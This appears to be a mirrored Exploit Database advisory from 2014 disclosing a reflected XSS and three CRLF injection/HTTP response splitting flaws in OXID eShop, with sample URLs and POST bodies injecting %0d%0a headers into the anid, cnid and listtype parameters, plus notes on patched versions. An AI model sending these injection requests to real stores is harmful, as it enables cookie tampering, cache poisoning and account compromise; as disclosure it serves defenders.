OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities

• Exploit Database
• 99 阅读

• 作者： //sToRm
  日期： 2014-03-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/32375/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175

  # Exploit Title: OXID eShop v<4.7.11/5.0.11 + v<4.8.4/5.1.4 Multiple Vulnerabilities # Google Dork: - # Date: 12/2013 # Exploit Author: //sToRm # Author mail: storm@sicherheit-online.org # Vendor Homepage: http://www.oxid-esales.com # Software Link: - # Version: All versions < 4.7.11/5.0.11 + All versions < 4.8.4/5.1.4 # Tested on: Multiple platforms # CVE : CVE-2014-2016 + CVE-2014-2017 (reserved)     ########################################################################################################### # XSS vulnerability #######################################################################################   Under certain circumstances, an attacker can trick a user to enter a specially crafted URI or click on a mal-formed link to exploit a cross-site scripting vulnerability that theoretically can be used to gain unauthorized access to a user account or collect sensitive information of this user.   SAMPLE: ------------------------------------------------------------------------------- http://HOST/tag/sample/sample-name.html?cur=2&listtype=tag&pgNr=2&searchtag=[XSS] ---------------------------------------------------------------------------------------   Products:   OXID eShop Enterprise Edition OXID eShop Professional Edition OXID eShop Community Edition   Releases: All previous releases Platforms: All releases are affected on all platforms. STATE - Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4. - A fix for OXID eShop version 4.6.8 is available.   Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-001   ########################################################################################################### ###########################################################################################################           ########################################################################################################### # Multiple CRLF injection / HTTP response splitting #######################################################   Under certain circumstances (depending on the browser, OS, PHP-Version), an attacker can trick a user to enter a specially crafted URI or click on a mal-formed link to exploit a HTTP response splitting vulnerability that theoretically can be used to poison cache, gain unauthorized access to a user account or collect sensitive information of this user.   A possible exploit by passing such a mal-formed URI could lead to: - return of a blank page or a PHP error (depending on one&apos;s server configuration) - set unsolicited browser cookies   Products:   OXID eShop Enterprise Edition OXID eShop Professional Edition OXID eShop Community Edition   Releases: All previous releases Platforms: All releases are affected on all platforms.   STATE: - Resolved in OXID eShop version 4.7.11/5.0.11. and OXID eShop version 4.8.4/5.1.4. - A fix for OXID eShop version 4.6.8 is available. Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-002     Vulnerability details:   ########################################################################################################### # 1 # CRLF injection / HTTP response splitting ############################################################   PATH: ROOT/index.php PARAMETER: anid   CONCEPT: -------------------------------------------------------------------------------------------------- actcontrol=start &aid=1 &am=1 &anid=%0d%0a%20[INJECT:INJECT] &cl=start &fnc=tobasket &lang=0 &pgNr=0 &stoken=1 -----------------------------------------------------------------------------------------------------------   SAMPLE: --- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------ actcontrol=start&aid=1&am=1&anid=%0d%0a%20INJECTED:INJECTED_DATA&cl=start&fnc=tobasket&lang=0&pgNr=0&stoken=1 ----------------------------------------------------------------------------------------------------------- ########################################################################################################### ###########################################################################################################           ########################################################################################################### # 2 # CRLF injection / HTTP response splitting ############################################################   PATH: ROOT/index.php PARAMETER: cnid   CONCEPT: -------------------------------------------------------------------------------------------------- actcontrol=details &aid=1 &am=1 &anid=0 &cl=details &cnid=%0d%0a%20[INJECTED:INJECTED] &fnc=tobasket &lang=0 &listtype=list &panid= &parentid=1 &stoken=1 &varselid%5b0%5d= -----------------------------------------------------------------------------------------------------------   SAMPLE: --- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------ actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=%0d%0a%20INJECTED:INJECTED_DATA&fnc=tobasket&lang=0&listtype=list&panid=&parentid=1&stoken=1&varselid%5b0%5d= ----------------------------------------------------------------------------------------------------------- ########################################################################################################### ###########################################################################################################           ########################################################################################################### # 3 # CRLF injection / HTTP response splitting ############################################################   PATH: ROOT/index.php PARAMETER: listtype   CONCEPT: -------------------------------------------------------------------------------------------------- actcontrol=details &aid=1 &am=1 &anid=0 &cl=details &cnid=0 &fnc=tobasket &lang=0 &listtype=%0d%0a%20[INJECTED:INJECTED] &panid= &parentid=0 &stoken=0 &varselid%5b0%5d= -----------------------------------------------------------------------------------------------------------   SAMPLE: --- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------ actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=0&fnc=tobasket&lang=0&listtype=%0d%0a%20INJECTED:INJECTED_DATA&panid=&parentid=0&stoken=0&varselid%5b0%5d= ----------------------------------------------------------------------------------------------------------- ########################################################################################################### ###########################################################################################################       Many greetings to all lunatics and freaks out there who live daily in the code like me and my partners. A thanks to the developers who have responded relatively quickly.   Cheers! //sToRm